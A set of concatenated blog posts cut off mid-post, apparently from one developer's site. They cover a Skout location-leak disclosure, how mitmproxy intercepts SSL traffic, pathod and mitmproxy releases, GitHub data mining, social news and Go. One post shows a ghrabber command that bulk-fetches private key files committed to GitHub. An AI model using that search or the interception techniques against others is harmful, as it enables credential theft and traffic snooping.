I reported the vulnerability to Skout on the 24th of May. I'm happy to report
that they immediately realised the seriousness of the situation, and their API
stopped returning exact lat/long values a few hours later. Subsequent
correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were
taking steps to tighten security. I've encouraged Skout to speak about this
publicly - their userbase needs to know about the issue, and need to be
reassured that action is being taken to ensure that this type of privacy breach
won't ever recur.</p>


How mitmproxy works
2013-05-16T00:00:00+00:00
I started work on mitmproxy</a> because I was frustrated
with the available interception tools. I had a long list of minor complaints -
they were insufficiently flexible, not programmable enough, mostly written in
Java (a language I don't enjoy), and so forth. My most serious problem, though,
was opacity. The best tools were all closed source and commercial. SSL
interception is a complicated and delicate process, and after a certain point,
not understanding precisely what your proxy is doing just doesn't fly.</p>
The text below is now part of the official
documentation</a> of mitmproxy. It's a
detailed description of mitmproxy's interception process, and is more or less
the overview document I wish I had when I first started the project. I proceed
by example, starting with the simplest unencrypted explicit proxying, and
working up to the most complicated interaction - transparent proxying of
SSL-protected traffic1</a></sup> in the presence of
SNI</a>.</p>
Explicit HTTP</h2>
Configuring the client to use mitmproxy as an explicit proxy is the simplest and
most reliable way to intercept traffic. The proxy protocol is codified in the
HTTP RFC</a>, so the behaviour of both the
client and the server is well defined, and usually reliable. In the simplest
possible interaction with mitmproxy, a client connects directly to the proxy and
makes a request that looks like this:</p>
GET http://example.com/index.html HTTP/1.1
</span></code></pre>
This is a proxy GET request - an extended form of the vanilla HTTP GET request
that includes a schema and host specification, and it includes all the
information mitmproxy needs to relay the request upstream.</p>

    
        
    </a>
</div>

    
        
            1</b></td>
            The client connects to the proxy and makes a request.</td>
        </tr>
        

            2</b></td>
            Mitmproxy connects to the upstream server and simply forwards
            the request on.</td>
        </tr>
    </tbody>
</table>
Explicit HTTPS</h2>
The process for an explicitly proxied HTTPS connection is quite different. The
client connects to the proxy and makes a request that looks like this:</p>
CONNECT example.com:443 HTTP/1.1
</span></code></pre>
A conventional proxy can neither view nor manipulate an SSL-encrypted data
stream, so a CONNECT request simply asks the proxy to open a pipe between the
client and server. The proxy here is just a facilitator - it blindly forwards
data in both directions without knowing anything about the contents. The
negotiation of the SSL connection happens over this pipe, and the subsequent
flow of requests and responses are completely opaque to the proxy.</p>
The MITM in mitmproxy</h3>
This is where mitmproxy's fundamental trick comes into play. The MITM in its
name stands for Man-In-The-Middle - a reference to the process we use to
intercept and interfere with these theoretically opaque data streams. The basic
idea is to pretend to be the server to the client, and pretend to be the client
to the server, while we sit in the middle decoding traffic from both sides. The
tricky part is that the Certificate
Authority</a> system is
designed to prevent exactly this attack, by allowing a trusted third-party to
cryptographically sign a server's SSL certificates to verify that they are
legit. If this signature doesn't match or is from a non-trusted party, a secure
client will simply drop the connection and refuse to proceed. Despite the many
shortcomings of the CA system as it exists today, this is usually fatal to
attempts to MITM an SSL connection for analysis. Our answer to this conundrum
is to become a trusted Certificate Authority ourselves. Mitmproxy includes a
full CA implementation that generates interception certificates on the fly. To
get the client to trust these certificates, we register mitmproxy as a trusted
CA with the device manually</a>.</p>
Complication 1: What's the remote hostname?</h3>
To proceed with this plan, we need to know the domain name to use in the
interception certificate - the client will verify that the certificate is for
the domain it's connecting to, and abort if this is not the case. At first
blush, it seems that the CONNECT request above gives us all we need - in this
example, both of these values are "example.com".  But what if the client had
initiated the connection as follows:</p>
CONNECT 10.1.1.1:443 HTTP/1.1
</span></code></pre>
Using the IP address is perfectly legitimate because it gives us enough
information to initiate the pipe, even though it doesn't reveal the remote
hostname.</p>
Mitmproxy has a cunning mechanism that smooths this over - upstream
certificate sniffing</a>. As
soon as we see the CONNECT request, we pause the client part of the
conversation, and initiate a simultaneous connection to the server. We complete
the SSL handshake with the server, and inspect the certificates it used. Now,
we use the Common Name in the upstream SSL certificates to generate the dummy
certificate for the client. Voila, we have the correct hostname to present to
the client, even if it was never specified.</p>
Complication 2: Subject Alternative Name</h3>
Enter the next complication. Sometimes, the certificate Common Name is not, in
fact, the hostname that the client is connecting to. This is because of the
optional Subject Alternative
Name</a> field in the SSL certificate
that allows an arbitrary number of alternative domains to be specified. If the
expected domain matches any of these, the client will proceed, even though the
domain doesn't match the certificate Common Name. The answer here is simple:
when extract the CN from the upstream cert, we also extract the SANs, and add
them to the generated dummy certificate.</p>
Complication 3: Server Name Indication</h3>
One of the big limitations of vanilla SSL is that each certificate requires its
own IP address. This means that you couldn't do virtual hosting where multiple
domains with independent certificates share the same IP address. In a world
with a rapidly shrinking IPv4 address pool this is a problem, and we have a
solution in the form of the Server Name
Indication</a> extension to
the SSL and TLS protocols. This lets the client specify the remote server name
at the start of the SSL handshake, which then lets the server select the right
certificate to complete the process.</p>
SNI breaks our upstream certificate sniffing process, because when we connect
without using SNI, we get served a default certificate that may have nothing to
do with the certificate expected by the client. The solution is another tricky
complication to the client connection process. After the client connects, we
allow the SSL handshake to continue until just after</em> the SNI value has been
passed to us. Now we can pause the conversation, and initiate an upstream
connection using the correct SNI value, which then serves us the correct
upstream certificate, from which we can extract the expected CN and SANs.</p>
There's another wrinkle here. Due to a limitation of the SSL library mitmproxy
uses, we can't detect that a connection hasn't</em> sent an SNI request until it's
too late for upstream certificate sniffing. In practice, we therefore make a
vanilla SSL connection upstream to sniff non-SNI certificates, and then discard
the connection if the client sends an SNI notification. If you're watching your
traffic with a packet sniffer, you'll see two connections to the server when an
SNI request is made, the first of which is immediately closed after the SSL
handshake. Luckily, this is almost never an issue in practice.</p>
Putting it all together</h3>
Lets put all of this together into the complete explicitly proxied HTTPS flow.</p>

    
        
    </a>
</div>

    
        
            1</b></td>
            The client makes a connection to mitmproxy, and issues an HTTP
            CONNECT request.</td>
        </tr>
        

            2</b></td>
            Mitmproxy responds with a 200 Connection Established, as if it
            has set up the CONNECT pipe.</td>
        </tr>
        

            3</b></td>
            The client believes it's talking to the remote server, and
            initiates the SSL connection. It uses SNI to indicate the hostname
            it is connecting to.</td>
        </tr>
        

            4</b></td>
            Mitmproxy connects to the server, and establishes an SSL
            connection using the SNI hostname indicated by the client.</td>
        </tr>
        

            5</b></td>
            The server responds with the matching SSL certificate, which
            contains the CN and SAN values needed to generate the interception
            certificate.</td>
        </tr>
        

            6</b></td>
            Mitmproxy generates the interception cert, and continues the
            client SSL handshake paused in step 3.</td>
        </tr>
        

            7</b></td>
            The client sends the request over the established SSL
            connection.</td>
        </tr>
        

            7</b></td>
            Mitmproxy passes the request on to the server over the SSL
            connection initiated in step 4.</td>
        </tr>
    </tbody>
</table>
Transparent HTTP</h2>
When a transparent proxy is used, the HTTP/S connection is redirected into a
proxy at the network layer, without any client configuration being required.
This makes transparent proxying ideal for those situations where you can't
change client behaviour - proxy-oblivious Android applications being a common
example.</p>
To achieve this, we need to introduce two extra components. The first is a
redirection mechanism that transparently reroutes a TCP connection destined for
a server on the Internet to a listening proxy server. This usually takes the
form of a firewall on the same host as the proxy server -
iptables</a> on Linux or
pf</a> on OSX. Once the client has
initiated the connection, it makes a vanilla HTTP request, which might look
something like this:</p>
GET /index.html HTTP/1.1
</span></code></pre>
Note that this request differs from the explicit proxy variation, in that it
omits the scheme and hostname. How, then, do we know which upstream host to
forward the request to? The routing mechanism that has performed the
redirection keeps track of the original destination for us.  Each routing
mechanism has a different way of exposing this data, so this introduces the
second component required for working transparent proxying: a host module that
knows how to retrieve the original destination address from the router. In
mitmproxy, this takes the form of a built-in set of
modules</a>
that know how to talk to each platform's redirection mechanism.  Once we have
this information, the process is fairly straight-forward.</p>

    
        
    </a>
</div>

    
        
            1</b></td>
            The client makes a connection to the server.</td>
        </tr>
        

            2</b></td>
            The router redirects the connection to mitmproxy, which is
            typically listening on a local port of the same host. Mitmproxy
            then consults the routing mechanism to establish what the original
            destination was.</td>
        </tr>
        

            3</b></td>
            Now, we simply read the client's request...</td>
        </tr>
        

            4</b></td>
            ... and forward it upstream.</td>
        </tr>
    </tbody>
</table>
Transparent HTTPS</h2>
The first step is to determine whether we should treat an incoming connection
as HTTPS. The mechanism for doing this is simple - we use the routing mechanism
to find out what the original destination port is. By default, we treat all
traffic destined for ports 443 and 8443 as SSL.</p>
From here, the process is a merger of the methods we've described for
transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing
mechanism to establish the upstream server address, and then proceed as for
explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p>

    
        
    </a>
</div>

    
        
            1</b></td>
            The client makes a connection to the server.</td>
        </tr>
        

            2</b></td>
            The router redirects the connection to mitmproxy, which is
            typically listening on a local port of the same host. Mitmproxy
            then consults the routing mechanism to establish what the original
            destination was.</td>
        </tr>
        

            3</b></td>
            The client believes it's talking to the remote server, and
            initiates the SSL connection. It uses SNI to indicate the hostname
            it is connecting to.</td>
        </tr>
        

            4</b></td>
            Mitmproxy connects to the server, and establishes an SSL
            connection using the SNI hostname indicated by the client.</td>
        </tr>
        

            5</b></td>
            The server responds with the matching SSL certificate, which
            contains the CN and SAN values needed to generate the interception
            certificate.</td>
        </tr>
        

            6</b></td>
            Mitmproxy generates the interception cert, and continues the
            client SSL handshake paused in step 3.</td>
        </tr>
        

            7</b></td>
            The client sends the request over the established SSL
            connection.</td>
        </tr>
        

            7</b></td>
            Mitmproxy passes the request on to the server over the SSL
            connection initiated in step 4.</td>
        </tr>
    </tbody>
</table>
^{1</sup>
I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p>
</div>


pathod 0.9
2013-05-16T00:00:00+00:00
I've just released pathod 0.9</a>, my toolset for crafting
malicious and interesting HTTP traffic. Apart from the usual range of stability
improvements and bugfixes, this release introduces a major new set of features:
proxy support. Pathoc</a>, the client, has sprouted
support for vanilla proxy connections, and is also able to tunnel through
proxies using CONNECT. Pathod</a>, the server, will
now respond to proxy requests as well as straight HTTP, and will treat CONNECT
requests as SSL with on-the-fly generation of dummy certificates.</p>
The Pathod changes in particular open a whole new range of possibilities for
fuzzing and other mischief. Any client with proxy support can be directed at
Pathod, which can then impersonate the upstream server and return the creatively
malicious response of your choice.</p>
There have also been some organizational changes. This is the first release
based on netlib</a>, the gonzo networking
library pathod now shares with mitmproxy</a>. Over the next
while, pathod and mitmproxy will move closer together. As a sign of this, the
major version numbers between these projects are now synchronized.</p>


mitmproxy 0.9
2013-05-15T00:00:00+00:00

    
        
    </a>
</div>
I'm happy to announce the release of mitmproxy 0.9</a>. This
is a major release, with huge improvements to mitmproxy pretty much across the
board. So much has happened in the year since the last release that it's
difficult to pick out the headlines. Mitmproxy is now faster, more scalable, and
works in more tricky corner cases than ever before. Full transparent mode
support has landed for both Linux and OSX. Content decoding is much nicer, with
a slew of new targets like
AMF</a> and Protocol
Buffers</a>. We now have a WSGI container that
allows you to host web apps right in the proxy. In addition to this, there is a
myriad of new features, bugfixes and other small improvements.</p>
There are also changes afoot in the project itself. As a first step, I've moved
mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier
for people to use the project in more contexts. Keep an eye out for more changes
along these lines soon, geared to broadening participation in the project.</p>
Changelog</h2>

Upstream certs mode is now the default.</li>
Add a WSGI container that lets you host in-proxy web applications.</li>
Full transparent proxy support for Linux and OSX.</li>
Introduce netlib, a common codebase for mitmproxy and
pathod</a>.</li>
Full support for SNI.</li>
Color palettes for mitmproxy, tailored for light and dark terminal
backgrounds.</li>
Stream flows to file as responses arrive with the "W" shortcut in
mitmproxy.</li>
Extend the filter language, including ~d domain match operator, ~a to
match asset flows (js, images, css).</li>
Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li>
--dummy-certs option to specify and preserve the dummy certificate
directory.</li>
Server replay from the current captured buffer.</li>
Huge improvements in content views. We now have viewers for AMF, HTML,
JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal
and raw views.</li>
Add Set Headers, analogous to replacement hooks. Defines headers that are set
on flows, based on a matching pattern.</li>
A graphical editor for path components in mitmproxy.</li>
A small set of standard user-agent strings, which can be used easily in
the header editor.</li>
Proxy authentication to limit access to mitmproxy</li>
</ul>


Google, destroyer of ecosystems
2013-03-14T00:00:00+00:00
Google has finally shut down a service I actually care about - Google Reader
will die a graceless, undignified death on July 1,
2013</a>.
The only way Google could inconvenience me more would be to shut down search
itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious
that they ever entered the RSS game at all. Consider this quote from a
TechCrunch article in January
2006</a>. Here, Michael
Arrington ends an article about the shutdown of a feed reader service with a
statement that seems truly bizarre today:</p>

The RSS reader space is becoming hyper competitive, with dozens of different
choices for readers.</p>
</blockquote>
A hyper competitive space with dozens of choices? Reader made its first public
appearance a couple of months before this, in October 2005. I remember this
period well - it was a time of immense excitement, when RSS seemed to be the
future, the news ecosystem was vibrant, and this thing called the blogosphere,
fueled by peer subscription, was doubling in size every six months. It was into
this magic garden that Google wandered, like a giant toddler leaving destruction
in its wake. Reader was undeniably a good product, but it's best quality was
also its worst: it was free. Subsidized by Google's immense search profits, it
never had to earn its keep, and its competitors started to die. Over time, the
"hyper competitive" RSS reader market turned into a monoculture. Today, on the
eve of its shutdown, RSS more or less means "Google Reader" to a large fraction
of readers, to the extent where even the best feed readers on IOS are just
Google Reader clients1</a></sup>.</p>
The sudden shock of Reader's closure will harm a news ecosystem that I already
believe to be deeply ill</a>.
Google Reader is not just a core part of my information diet - it's also the
most direct channel I have to readers of this blog. As of today, the Reader
subscriber count for corte.si</a> stands at about 3 times the
total number of other subscribers combined. Some of these readers will migrate
to other services and stay in touch, but many will inevitably abandon the idea
of direct subscription to blogs entirely. In the next few months, tens of
thousands of small blogs will lose direct contact with a large fraction of their
readers.</p>
The truth is this: Google destroyed the RSS feed reader ecosystem with a
subsidized product, stifling its competitors and killing innovation. It then
neglected Google Reader itself for years, after it had effectively become the
only player. Today it does further damage by buggering up the already
beleaguered links between publishers and readers. It would have been better for
the Internet if Reader had never been at all.</p>
^1</sup>Yes, I'm aware that there are a few hardy outliers still playing in this
place. My own logs show that their reach is insignificant, though, and when I
tried to shift my subscriptions about a year ago, there was nothing as good as
Reader itself. Once NewsBlur's</a> servers have
recovered, I definitely plan to give it another shot.</p>
</div>


Things I found on GitHub: aspell custom dictionary entries
2013-02-26T00:00:00+00:00
I've been doing a series of posts looking at data gathered with
ghrabber</a>, a simple tool I wrote that lets
you grab files matching a search specification from GitHub. Last week, I looked
at shell history</a> in the broad, and
then specifically at pipe chains</a>.
Today, I move on to something different - custom aspell</a>
dictionaries. When aspell finds a word it doesn't recognize, the user is
prompted to correct it, ignore it, or add it to a custom dictionary so that it
will be recognized as correct in future. These words are written to the user's
custom dictionary - a file named .aspell_en_pw</strong> that lives in the user's
home directory. It turns out that 30 people have checked aspell dictionaries
into GitHub, containing a total of 9501 custom words. The chart below shows the
top 50 words, with the X-axis showing the percentage of files the word appeared
in.</p>

    
        
    </a>
</div>
There were a few requests for the raw data behind the previous two posts, so
this time round you can also download a CSV file</a>
with the occurrence totals for each word in the dataset.</p>


Things I found on GitHub: pipe chains
2013-02-22T00:00:00+00:00
Earlier this week I published ghrabber</a>, a
simple tool that lets you grab files matching an arbitrary search specification
from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history
files accidentally checked in to repos, and took a light look at the dataset
with some simple
graphs</a>. In total, I
obtained 234 shell history files with 165k individual command entries. This is a
very rare opportunity to "shoulder-surf", to actually see what people do</em> at
the command prompt, and perhaps get some insights into how to improve things.</p>
Along those lines, today's post looks at pipe chains - that is, compound
commands that pipe the output of one command to another. The pipe operator lies
at the core of the Unix command-line philosophy. The fact that we can easily
compose complex operations is the reason why we are able to write small tools
that "do one thing well" without losing generality. The shell history data on
Github can give us some real data about what people do with composed commands,
and how they do it.</p>

    
        
    </a>
</div>
It turns out that about 2% of all commands issued on the command-line use
pipes. The graph above shows the prevalence the most common pipe chains - that
is, what percentage of the user in my sample used each chain. There's a lot of
fascinating stuff we can read straight from this image.</p>
Starting at the top, the first thing we notice is how widely used the ps |
grep</strong> chain is. About 17% of users in my sample used this chain - given the
type of data we have, the real-world prevalence would surely be higher still.
I've just been extolling the virtues of small tools and composability, but in
this case practicality should beat purity. I suggest that everyone should have
a command-alias similar to this in their shell configuration:</p>
alias </span>pg</span>="</span>ps aux | grep</span>"
</span></code></pre>
I've added this to my .zshrc today, and I've already used it twice.</p>
Next up, we have the ls | grep</strong> pipes. The vast majority of uses here could
actually be accomplished using the shell's filename generation mechanism.  This
ranges from simple redundancies like grepping for file extensions, to
performing quite complex matching operations that could be done using the
shell's advanced glob operations. I'm guilty of this myself - I rarely use
features like recursive globbing, expansions using character ranges, case
insensitive globbing, and so forth. I've brushed up on filename expansion for
my chosen shell</a>, and perhaps you should
too.</p>
The last thing I want to point out is a pattern that's genuinely dangerous -
curl | bash</strong>, along with its cousins curl | sh</strong> and wget | sh</strong>.
Unfortunately, this has become the recommended installation pattern for some
tool - the vast majority of invocations here are for RVM</a> and
Yeoman</a>. I don't think it's a good idea to pipe anything
from the web straight into a local shell, but the situation is made
particularly dire by the fact that almost half of these invocations are either
over plain HTTP or explicitly turn certificate validation off.</p>
I'll stop here, although there are interesting things to say about nearly every
entry in the graph above. Next week, I'll move on from the shell history
sample, look at some other juicy datasets extracted using ghrabber.</p>


Things I found on GitHub: shell history
2013-02-19T00:00:00+00:00
Github recently introduced hugely improved code
search</a>, one of those rare
moments when a service I use adds a feature that directly and measurably
measurably improves my life. Predictably, there was soon a
flurry</a>
of</a>
breathless</a>
stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has
security or privacy implications, a law of the universe almost as solid as the
second law of thermodynamics. We saw this with Google's own code
search</a>, as well as Google
proper</a>, Facebook's Graph
Search</a> and even
Bing</a>.
A certain fraction of people will always make mistakes, and and any sufficiently
powerful search will allow bad guys to find and take advantage of the outliers.</p>
After the dust had settled a bit I started wondering what else we could do with
Github's search - other than snookering schmucks who checked in their private
keys. I'm always enticed by data, and the combination of search and the ability
to download raw checked-in files seemed like a promising avenue to explore. Lets
see what we can come up with.</p>
ghrabber</a> - grab files from GitHub</h2>
First, some tooling. I've just released ghrabber, a simple tool that lets you
grab all files matching a search specification from GitHub. Here, for instance,
is an obvious wheeze - fetching all files with the extension ".key":</p>
./ghrabber.py </span>"</span>extension:key</span>"
</span></code></pre>
Downloaded files are saved locally to files named user.repository</strong>. Existing
files with the same name are skipped, which means that you can reasonably
efficiently stop and resume a ghrab.</p>
Shell history files</h2>
I've been having a lot of fun exploring Github with ghrabber. I'll return to
this in future posts - today I'll start with a quick illustration of what can
be done. One type of difficult-to-find information that is sometimes checked in
to repos is shell history. Two simple ghrabber commands for the two most
popular shells is all we need:</p>
./ghrabber.py </span>"</span>path:.bash_history</span>"
</span></code></pre>
and</p>
./ghrabber.py </span>"</span>path:.zsh_history</span>"
</span></code></pre>
After cleaning the data a bit, I had 234 history files varying in length from 1
line to just over 10 thousand, containing a total of 165k entries. I fed this
into Pandas</a> for analysis, parsing each command
using a combination of hand-hacked heuristics and the built-in
shlex</a> module. The remainder of
this post is a light exploration of some approaches to this dataset, steering
clear of the obvious and tediously well-covered security implications.</p>

    
        
    </a>
</div>
One way to slice the data is to look at the percentage of history files a given
command appears in. This gives us a nice listing of the top commands by user
prevalence, which you can see in the graph on the left above. On the right, I've
taken the same list of commands, and checked how many invocations are preceded
by a man</strong> lookup for the command. This gives us an idea of which
commonly-used commands have difficult or unintuitive interfaces. It's
interesting that ln</strong> is right at the top of the list, considering how simple
the command syntax is. My theory is that everyone forgets the order of the
source and target files.</p>

    
        
    </a>
</div>

    
        
    </a>
</div>
Since we have a list of the most widely used commands, it's also trivial to do
silly popularity comparisons. Above is the obvious look at the state of the
editor wars (vim is winning, folks), and a check on how
tmux</a> is doing in supplanting screen (the faster
the better).</p>

    
        
    </a>
</div>

    
        
    </a>
</div>

    
        
    </a>
</div>

    
        
    </a>
</div>
Another interesting thing to do is to look at the most commonly used flags to
commands. I think having "real data" of command use may well guide us to design
better command-line interfaces. I'd love to know the most common invocation
flags for some of the tools I write.</p>
I'll stop there. The data pool in this case is very deep, and there are a huge
range of interesting bits of command-line ethnography that could be done. Stay
posted for more in the coming weeks.</p>


The trouble with social news
2013-01-24T00:00:00+00:00
There is something terribly awry with the social news ecosystem. This is a
feeling that's been growing on me over the last few years, and is the reason why
I've cut both Reddit</a> and Hacker
News</a> (who together constitute pretty much all of
"social news") out of my information diet.  Although I've mulled over things in
various conversations, I've never actually tried to put my feeling of unease in
writing, until today. What's spurring me into action is a proposal by Yann
LeCun</a> that a model
similar to social news be adopted for scientific peer review - self-assembled
Reviewing Entities voting on streams of submitted papers, regulated by a
reputation system for authors and reviewers. Basically, this is science a la
Reddit: complete with subreddits, karma and upboats. I find the idea frankly
terrifying.</p>
I guess it's time, then, to put finger to keyboard and lay out what disquiets
me about social news.</p>
Karma Corrupts</h2>
You start by introducing a reputation mechanism like
karma</a> to improve some outcome - say, to
increase the quality of comments, or to apply a threshold to restrict voting to
trustworthy community members. This seems like a plausible and even elegant
mechanism at first, until you discover the terrible side-effects.</p>
Humans are fundamentally status-seeking social apes, and you've now introduced
a visible measure of social worth that people will be driven to maximize. In
the real world, we have a word for those who spend their lives accumulating
karma - we call them politicians. And so, within karma communities, we see the
rise of a political class - persuasive centrists who cater (perhaps
unconsciously) to a constituency, and who express (perhaps eloquently) opinions
calculated to appeal to the masses and avoid controversy. Hacker News and many
subreddits are dominated by people like this, whose comments are largely
predictable and rarely add anything new or unexpected to the conversation.</p>
At the bottom end of the food chain, we have a different class of creature with
the same basic aim as the politicians, but without the persuasive charm needed
to pull off the political approach. These are the karma whores, who use a
mixture of frank pandering, provocation and calculated outrage to achieve the
same aims.</p>
The karma maximization game often acts contrary to the goals we aimed to
achieve by introducing karma in the first place: the tenor of the community
suffers, the diversity of opinion declines, and the karma whores post pictures
of their cats everywhere.</p>
The Lossy Sieve</h2>
Go and have a look at the new story submission
queue</a> on Hacker News. Scroll through a few
pages, and pay attention to the stories stuck at one vote - they will most
likely never receive another upvote and will die in obscurity. Now, go look at
the front page</a>. When I do this exercise I'm
struck by the fact that there's plenty of crap on the front page, and quite a
bit of good stuff in the submission queue languishing in obscurity. So, quality
can't be the sole metric here - what determines what gets onto the front page
and what doesn't?</p>
Lets try a thought experiment. First, set up a small number of voting accounts - say,
10 or so. Now, in the new submission queue, pick 5 random stories every
hour, and give them a small number of upvotes soon after they are submitted. I
predict that you will find that stories that received this small initial boost
are vastly more likely to end up on the front page. If I'm right, then chance
dominates story selection - as long as an article exceeds some basic quality
threshold, it all depends on who happens to see the story soon after it is
submitted, and whether the spirit moves them to vote. Note that this is not the
case at the extremes - frankly bad content won't be upvoted, and really
important stories will usually find their way to the top. The lossy sieve
phenomenon affects everything in between.</p>
What this boils down to is that social news doesn't provide an effective filter - good
content gets lost, and mediocre content finds its way onto our screens.</p>
The Pinhole Effect</h2>
In social news, the front page is king. Most users never go beyond the first or
second page of top stories. However, front-page real estate is incredibly
limited compared to the volume of submissions on most popular subreddits and on
Hacker News. The effect of this is that we're looking at a fast-flowing river
of information through a pinhole.  Even assuming that the selection mechanism
works flawlessly, what you see on the front page is a small sliver of the
total, chosen through a consensus mechanism that takes no account of individual
variation in tastes and interests. The news you see is not tailored to you</em> -
it's tailored to some abstract, average participant, with all the rough edges
of individuality smoothed away. The effect of this is that even at its best,
the stories that emerge from the social news system feel like a predictable
pablum dished up by the hivemind. The subreddit system tries to improve this by
allowing communities to self-assemble around interests, but the pinhole effect
still dominates in busy subreddits like
/r/programming</a>.</p>
Gaming The System</h2>
Social news systems are eminently gameable, and cheating is rife. Part of the
reason for this is that a story's destiny depends on a relatively small number
of votes. If your story has any merit at all, you significantly increase the
likelihood that it will end up on the front page by giving it a small nudge at
the beginning of its life. If it has no merit whatsoever, you can still force
it onto people's screens with a few tens or hundreds of votes. Conversely, you
can use the same effect to censor and oppress views you disagree with if your
social news site has downvotes. Anyone who's kept an eye on these things can
rattle off examples of gaming in action: the voting
rings</a>, the "social media
consultants"</a>,
the vigilante thought-polizei</a>,
the political
operators</a>,
and dozens of other types of manipulation and villainy. What's more - these
visible scandals are just the tip of the iceberg. Eyeballs are valuable, and
there's an active arms race with social news sites on the one side, and a dark
army of spammers, scammers and true believers on the other. How much of what we
see is affected by this type of cheating? We just don't know, but my suspicion
is that the effect is significant.</p>
The point here is broader than any particular instance of gaming. It's that
social news sites are structurally susceptible to manipulation in ways that
can't be fixed without changing the core of their operation. A system like this
might be good enough to deliver rage
comics</a>, but I feel queasy trusting
it any further.</p>
Community Collapse Disorder</h2>
My final beef with social news is a problem that it shares with pretty much all
online communities, especially technical ones. We're all familiar with the
life-cycle of technical forums. They start with a small community of insiders
who create value, which then attracts more people to participate, which then
dilutes the quality of the contributions (and often introduces a few
pathological bad actors), which then causes the good contributors to move on,
which causes the magic well to dry up. Everyone then take their toys and move
to the next community, and the cycle repeats. We saw this with Usenet and the
original C2 wiki, and we are seeing it now with Hacker News and many technical
subreddits all at various points in this life-cycle.</p>
I believe that Community Collapse Disorder is one of the Big Problems online
that we don't yet have a satisfactory solution to. People are trying, though.
Hacker News, for instance, seems to be rather poignantly aware of its own
decline</a>,
with some of the best of the old-timers calling for an
alternative</a>.
Paul Graham himself recognizes the issue, and has been tweaking things in
various ways to combat the phenomenon, without much success.</p>
At the moment, we just don't know how to build online communities that are both
inclusive and stable. Democracy, here, seems to lead inevitably to decline, and
social news sites are no exception.</p>
A better way forward?</h2>
A big part of the reason I don't use social news anymore is that my existing
social networks have become so much more effective at turning up good content.
The absolute best source of news for me is simply the set of links shared by
the folks I follow on Twitter</a>. I follow people
who post interesting content, and whom I trust to act as information filters
for me. Most of them share my technical interests, but some are interesting
because they are from my home town, or because they share some more esoteric
pursuit with me. So, the news stream I see is exactly tailored to me. At the
same time, there is also room idiosyncrasy - if someone I follow shares
something left-field that tickles their fancy, I'll see it. In turn, I try to
be a responsible information filter for those who follow me - I find a link or
two worth tweeting on most days.</p>
There are still things I miss - Twitter is great for sharing links, but is an
awful medium for technical discussion.
Google+</a> could be a better
alternative, but just doesn't seem to have achieved liftoff for me. I would
also love better tools for aggregating and harvesting links from my social
network. At the moment I use Flipboard</a> and
Prismatic</a>, but I have issues with both. On the
whole, though, these are quibbles. It seems to me that using social networks to
filter news is a better way forward - if I was tackling the social news
problem, I'd be building tools to support this process.</p>


Go: a nice language with an annoying personality
2013-01-18T00:00:00+00:00
Last week, I had the pleasure of attending Dropbox</a>'s
annual company hack fest</a>.  It
was a great opportunity to get a look at how Dropbox works internally, and
mingle with the smart and driven folks who make one of my favourite products. In
the spirit of hack week, me and my friend
@alexdong</a> decided to do our project in Go. We'd
both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful
that Go would turn out to hit a magical sweet spot: a light set of abstractions
hugging close to the machine, while still providing the indoor plumbing and
civilized conveniences of life that I had grown used to with languages like
Python. Five days of furious hacking later, I can report that Go might well
deliver on this promise, but has enough annoying personality quirks that I will
think twice about basing any more projects on it.</p>
My main beef with Go has nothing to do with fundamental language design, and may
seem almost inconsequential at first glance. The Go compiler treats unused
module imports and declared variables as compile errors. This is great in theory
and is something you might well want to enforce before code can be committed,
but during the actual process</em> of producing code it's nothing but an irksome,
unnecessary pain in the ass. Let's look at a concrete example, starting with a
snippet of code as follows 1</a></sup></p>
import </span>(
    "</span>io/ioutil</span>"
)
...
...
    </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
...
...
    </span>DoSomething</span>(</span>m</span>)
</span></code></pre>
I'm a firm believer that printing stuff to screen is a programmer's best
debugging tool, so say we're hacking away and want to print the value of m</strong>
while running our unit tests. We change the code as follows, adding an import
for the "fmt" module and a call to Print:</p>
import </span>(
    "</span>io/ioutil</span>"
    "</span>fmt</span>"
)
...
...
    </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
    </span>fmt</span>.</span>Print</span>(</span>m</span>)
...
...
    </span>DoSomething</span>(</span>m</span>)
</span></code></pre>
Now we keep hacking, and want to comment out the print statement for a moment
like so:</p>
import </span>(
    "</span>io/ioutil</span>"
    "</span>fmt</span>"
)
...
...
    </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
    </span>//fmt.Print(m)
</span>...
...
    </span>DoSomething</span>(</span>m</span>)
</span></code></pre>
This is a compile error. We have to switch contexts, move to the top of the
module, also comment out the import, and then move back to the spot we're
really hacking on:</p>
import </span>(
    "</span>io/ioutil</span>"
    </span>//"fmt"
</span>)
...
...
    </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
    </span>//fmt.Print(m)
</span>...
...
    </span>DoSomething</span>(</span>m</span>)
</span></code></pre>
A few seconds later, we want to re-enable the Print statement - so up we go
again to the top of the module to re-enable the import. This is even worse when
we want to, say, comment out the DoSomething</strong> call while hacking:</p>
import </span>(
    "</span>io/ioutil</span>"
)
...
...
    </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>)
    </span>if </span>err </span>!= </span>nil </span>{
        </span>return </span>nil</span>, </span>err
    </span>}
...
...
    </span>//DoSomething(m)
</span></code></pre>
This is also a compile error because now m</em> is unused. We have to hunt up in
our code to find the declaration, which could be explicit or implicit using an
:=</strong> assignment. So, in this case we find the declaration, and use the magic
underscore name to throw the offending value away:</p>
import </span>(
    "</span>io/ioutil</span>"
)
...
...
